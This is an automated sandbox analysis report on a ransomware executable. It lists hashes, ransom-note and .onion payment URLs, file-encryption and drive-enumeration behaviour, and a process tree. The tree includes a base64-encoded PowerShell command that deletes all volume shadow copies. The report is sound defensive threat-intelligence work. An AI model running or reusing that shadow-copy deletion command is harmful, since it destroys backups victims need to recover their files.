Analysis
-
max time kernel
154s -
max time network
130s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
30-01-2022 07:59
Static task
static1
Behavioral task
behavioral1
Sample
1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe
Resource
win10-en-20211208
General
-
Target
1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe
-
Size
114KB
-
MD5
5a38c1570c196b855ef2ce54986efae4
-
SHA1
f792d8798fc1fc32e9cfc2cdf0f635d178e4c5a2
-
SHA256
1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281
-
SHA512
8382b88202d6a3c10dcbe971c789a2cb8d0b3b0b48bced1df8d32e89661f0262bc50b39426db2a7cfc549763c5579c203db9b2ce88186b9f75550f6dfbf4a6b8
Malware Config
Extracted
C:\3cqd8-readme.txt
http://dnpscnbaix6nkwvystl3yxglz7nteicqrou3t75tpcc5532cztc46qyd.onion/posts/63
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/32E393E21EC88037
http://decryptor.cc/32E393E21EC88037
Signatures
-
Modifies extensions of user files 7 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exedescription ioc process File renamed C:\Users\Admin\Pictures\UnprotectLock.raw => \??\c:\users\admin\pictures\UnprotectLock.raw.3cqd8 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe File renamed C:\Users\Admin\Pictures\UnblockConvertFrom.tif => \??\c:\users\admin\pictures\UnblockConvertFrom.tif.3cqd8 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe File opened for modification \??\c:\users\admin\pictures\DenyStep.tiff 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe File renamed C:\Users\Admin\Pictures\AddDisconnect.png => \??\c:\users\admin\pictures\AddDisconnect.png.3cqd8 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe File renamed C:\Users\Admin\Pictures\DenyStep.tiff => \??\c:\users\admin\pictures\DenyStep.tiff.3cqd8 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe File renamed C:\Users\Admin\Pictures\DisconnectProtect.tif => \??\c:\users\admin\pictures\DisconnectProtect.tif.3cqd8 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe File renamed C:\Users\Admin\Pictures\FindSplit.crw => \??\c:\users\admin\pictures\FindSplit.crw.3cqd8 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exedescription ioc process File opened (read-only) \??\U: 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe File opened (read-only) \??\Y: 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe File opened (read-only) \??\Z: 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe File opened (read-only) \??\F: 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe File opened (read-only) \??\J: 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe File opened (read-only) \??\N: 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe File opened (read-only) \??\O: 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe File opened (read-only) \??\K: 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe File opened (read-only) \??\R: 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe File opened (read-only) \??\W: 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe File opened (read-only) \??\S: 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe File opened (read-only) \??\V: 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe File opened (read-only) \??\D: 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe File opened (read-only) \??\B: 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe File opened (read-only) \??\E: 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe File opened (read-only) \??\G: 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe File opened (read-only) \??\M: 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe File opened (read-only) \??\P: 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe File opened (read-only) \??\Q: 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe File opened (read-only) \??\T: 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe File opened (read-only) \??\X: 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe File opened (read-only) \??\A: 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe File opened (read-only) \??\H: 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe File opened (read-only) \??\I: 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe File opened (read-only) \??\L: 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\System32\CatRoot2\dberr.txt powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\283s.bmp" 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe -
Drops file in Program Files directory 32 IoCs
Processes:
1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exedescription ioc process File opened for modification \??\c:\program files\GroupUndo.tiff 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe File opened for modification \??\c:\program files\JoinDeny.css 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe File opened for modification \??\c:\program files\NewDisconnect.ini 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe File opened for modification \??\c:\program files\SelectRestore.asx 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe File opened for modification \??\c:\program files\UnlockUpdate.dxf 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe File opened for modification \??\c:\program files\DisableTrace.mpg 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe File opened for modification \??\c:\program files\ConvertFromConnect.easmx 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe File opened for modification \??\c:\program files\DenyUnblock.crw 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe File opened for modification \??\c:\program files\RestartOpen.wax 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe File opened for modification \??\c:\program files\SelectConfirm.shtml 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe File opened for modification \??\c:\program files\ApproveMeasure.gif 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe File opened for modification \??\c:\program files\WatchOut.mp4 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe File opened for modification \??\c:\program files\SplitCompare.xml 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe File opened for modification \??\c:\program files\DebugCompress.WTV 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe File opened for modification \??\c:\program files\ExitImport.jpeg 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe File opened for modification \??\c:\program files\PopNew.tif 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe File opened for modification \??\c:\program files\SuspendConvert.ADTS 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe File opened for modification \??\c:\program files\BackupUnregister.kix 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe File opened for modification \??\c:\program files\OutAssert.asp 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe File opened for modification \??\c:\program files\SyncExpand.mp2v 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe File opened for modification \??\c:\program files\WriteSkip.emf 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe File created \??\c:\program files\3cqd8-readme.txt 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe File opened for modification \??\c:\program files\MoveLimit.ppsm 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe File opened for modification \??\c:\program files\AssertUpdate.xlsm 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe File opened for modification \??\c:\program files\CheckpointCompare.dotm 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe File opened for modification \??\c:\program files\GetConvert.ttc 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe File opened for modification \??\c:\program files\HideProtect.raw 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe File opened for modification \??\c:\program files\SetCompress.mp2v 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe File opened for modification \??\c:\program files\UnpublishUnlock.rle 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe File created \??\c:\program files (x86)\3cqd8-readme.txt 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe File opened for modification \??\c:\program files\RenameUpdate.png 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe File opened for modification \??\c:\program files\EditSave.xla 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exepowershell.exepid process 1348 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe 1348 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe 3176 powershell.exe 3176 powershell.exe 3176 powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1348 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe Token: SeDebugPrivilege 3176 powershell.exe Token: SeBackupPrivilege 2752 vssvc.exe Token: SeRestorePrivilege 2752 vssvc.exe Token: SeAuditPrivilege 2752 vssvc.exe Token: SeTakeOwnershipPrivilege 1348 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe -
Suspicious use of WriteProcessMemory 2 IoCs
Processes:
1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exedescription pid process target process PID 1348 wrote to memory of 3176 1348 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe powershell.exe PID 1348 wrote to memory of 3176 1348 1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe"C:\Users\Admin\AppData\Local\Temp\1638d7ce9e804cd3e017fe2d8effa0d0d48aa74baa93c8c50f1927bc25fcd281.exe"1⤵
- Modifies extensions of user files
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1348 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3176
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:544
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2752
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/3176-120-0x000001E871850000-0x000001E871872000-memory.dmpFilesize
136KB
-
memory/3176-121-0x000001E871900000-0x000001E871902000-memory.dmpFilesize
8KB
-
memory/3176-122-0x000001E871903000-0x000001E871905000-memory.dmpFilesize
8KB
-
memory/3176-127-0x000001E873C30000-0x000001E873CA6000-memory.dmpFilesize
472KB
-
memory/3176-138-0x000001E871906000-0x000001E871908000-memory.dmpFilesize
8KB